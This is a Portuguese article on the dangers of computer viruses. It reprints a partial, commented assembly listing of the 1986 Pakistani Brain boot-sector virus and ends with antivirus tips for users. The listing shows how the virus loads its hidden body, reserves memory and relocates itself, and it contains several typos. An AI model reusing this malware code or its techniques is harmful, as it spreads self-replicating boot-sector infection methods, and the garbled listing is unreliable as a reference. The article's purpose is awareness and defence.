PCP

Inadvertidamente ou deliberadamente os programas de vírus tem a capacidade de autoclonagem e reprodução constante nos meios hospedeiros, cujo objetivo é a destruição sem deixar rastros, a contaminação de um simples equipamento pessoal até um sofisticado e milionário mainframe se dá via MoDem (Internet) ou periféricos (CDs, DVDs, PenDriver, HD externo, etc.) contaminados. O que poucos sabem é que não só o software é afetado por estes predadores mas o próprio hardware, embora raramente, é destruído.

Imagine o que aconteceria com um sistema de tráfego aéreo controlado por computadores, nos países com sistema de defesa computadorizada, nos programas aeroespaciais ou até mesmo em automóveis com sistema de freio ou aceleração controlada por microprocessadores, seria o caos sem dúvida.

O pior é que os programas de vírus são tão fáceis de se fazer que praticamente não exigem conhecimento específicos.
Veja, por exemplo, a dissecação do vírus PAKISTANI BRAIN efetuada pela Interpath Corporation (USA).

;------------------------------------------------------------------------;
; VIRUS PAKISTANI BRAIN ;
;------------------------------------------------------------------------;
CODE SEGMENT PUBLIC 'CODE'
ASSUME CD;CODE,DS:CODE,ES:CODE,SS:CODE
;
ORG 7C00H ;BOOT SECTOR ORG!
;
;------------------------------------------------------------------------;
; ;
;------------------------------------------------------------------------;
BEGIN: CLI ;
JMP CONTINUE ;7D4E
;
;------------------------------------------------------------------------;
; DATA AREA ;
;------------------------------------------------------------------------;
DB 34H,12H ;
;
;----------------------------------;
;THE FOLLOWING IS THE LOCATION OF THE VIRUS MAIN BODY WHICH RESIDES INSIDE



;OF THE 3K BAD TRACK AREA. 512 BYTES OF BOOT SECTOR, 2.5K OF VIRUS
L_HEAD DB 0 ;HEAD
L_TRACK_SECT LABEL WORD ;
DB 9 ;TRACK

DB 8 ;SECTOR
;
;------------------------------------;
; HEAD DB 7 ;USED BY READ_SECTOR
TRACK_SECT LABEL WORD ;USED BY READ_SECTOR ETC.
SECTOR DB 1 ;
TRACK DB 7 ;
;
DB ' Welcome to the Dungeon'
DB '
DB ' (C) 1986 Basic $ Amjad (pvt) Ltd.'
DB ' BRAIN COMPUTER SERVICES...'
DB '730 NIZAM BLOCK ALLAMA IQBAL TOWN'
DB ' LAHORE-PAKISTAN...'
DB 'PHONE :430791,443248,280530.'
DB ' Bware of this VIRUS.....'
DB 'Contact us for vaccination..................'
DB '.$#@%$@!!'
;------------------------------------------------------------------------;
; ;
;------------------------------------------------------------------------;
CONTINUE: ;7D4E
MOV AX,CS ;
MOV DS,AX ;
MOV SS,AX ;
MOV SP,0F000H ;
STI ;
;
MOV AL,[L_HEAD] ;INITIALIZE HEAD/TRACK/SECTOR

MOV [HEAD],AL ;
MOV CX,[L_TRACK_SECT] ;
CALL NEXT_SECTOR ;

MOV CX,5 ;READ MAIN BODY OF VIRUS INTO MEMORY
MOV BX,offset BEGIN + 512 ; (5 SECTORS LONG)
C_10: CALL READ_SECTOR ;
CALL NEXT_SECTOR ;
ADD BX,512 ;
LOOP C_10 ;
;
MOV AX,[0413H] ;0040:0014==MEMORY SIZE
SUB AX,7 ;SUBSTRACT 7K !
MOV DS:[0413H],AX ;
;
MOV CL,6 ;MOVE OURSELF TO TOP OF MEMORY
SHL AX,CL ;
MOV ES,AX ;
MOV SI,offset BEGIN ;
MOV DI,0 ;
MOV CX,1004H ;MOVE 4K + 4 BYTES
CLD ;
REP MOVSB ;
;
PUSH ES ;JUMP TO US UP THERE


MOV AX,200H ;
PUSH AX ;
RETF ;
;
;-------------------------------------------------------------------------;
; READ A SECTOR ;
; ;
;ON ENTRY: ES:BX = DTA ;
;-------------------------------------------------------------------------;
READ_SECTOR: ;7D9C
PUSH CX ;
PUSH BX ;
;
MOV CX,4 ;RETRY COUNT = 4
RS_10: PUSH CX ;
MOV DH,[HEAD] ;
MOV DL,0 ;
MOV CX,[TRACK_SECT] ;
MOV AX,201H ;READ 1 SECTOR
INT 13H ;
JNB RS_90 ;JUMP ON ERROR
MOV AH,0 ;RESET
INT 13H ;
POP CX ;
LOOP RS_10 ;TRY AGAIN
INT 18H ;ELSE LOAD BASIC
;
RS_90: POP CX ;
POP BX ;
POP CX ;
RET ;
;

;-------------------------------------------------------------------------;
; INC. SECTOR AND OVER FLOW INTO HEAD & TRACK ;
;-------------------------------------------------------------------------;
NEXT_SECTOR: ;7DC0
MOV AL,[SECTOR] ;
INC AL ;
MOV [SECTOR],AL ;
CMP AL,10 ;
JNZ NS 90 ;
MOV DS:[SECTOR],1 ;
MOV AL,[HEAD] ;
INC AL ;
MOV [HEAD],AL ;
CMP AL,2 ;
JNZ NS_90 ;
MOV DS:[HEAD]:0 ;
INC DS:[TRACK] ;
NS_90: RET ;
;

;-------------------------------------------------------------------------;
; ;
;-------------------------------------------------------------------------;
CODE EMDS ;
END BEGIN ;


Por motivos óbvios, a listagem é apenas parcial e, por si só, inofensiva.

A ação do vírus Pakistani Brain é ativada quando acionado o processo de reset via teclado (CTRL+ALT+DEL), a interrupção INT 09H, ao que fica ativo para contaminação.

CONSELHOS AOS USUÁRIOS

Algumas regras devem ser básicas no dia-a-dia:

1 - Cuidado com os periféricos de manutenção utilizados pelos técnicos de software ou hardware, eles são os maiores portadores de vírus por andarem de computador em computador, vacine-os antes de permitir o uso em seu micro.

2 - Os CDs que acompanham placas de hardware, tipo placas VGA, multi I/O, placas mãe de PC, placas de rede, etc., de procedência fácil e barata devem ser vacinados, não raramente trazem consigo vírus "incríveis".

3 - A pirataria de software é sem dúvida uma das mais prolíferas e contaminadas com vírus, é como a AIDS, não corra o risco para descobrir que se deu mal.

4 - Nunca acredite que o seu micro computador está livre de vírus porque só você o usa, aquele PenDriver que você emprestou para um amigo pode voltar "bixado".

5 - Periodicamente vacine todos seu periféricos e HDs,... nunca se sabe.

6 - Tenha certeza de que o disco rígido do seu computador não contém vírus, instale uma vacina eficiente e mantenha-a residente nele, assim basta um periférico contaminado e este será recusado, não contaminando o computador.

7 - Periodicamente e com prazo não superior a 90 dias, procure o fabricante do antivirus que você utiliza e providencie uma atualização. Evite uma versão pirateada, você pode estar adquirindo uma vacina já com vírus.

8 - Faça Backup Diariamente, se acontecer a destruição dos dados de seu HD, seja por vírus ou outra razão qualquer,
você poderá recuperar todos os dados em backup.

Boa sorte!...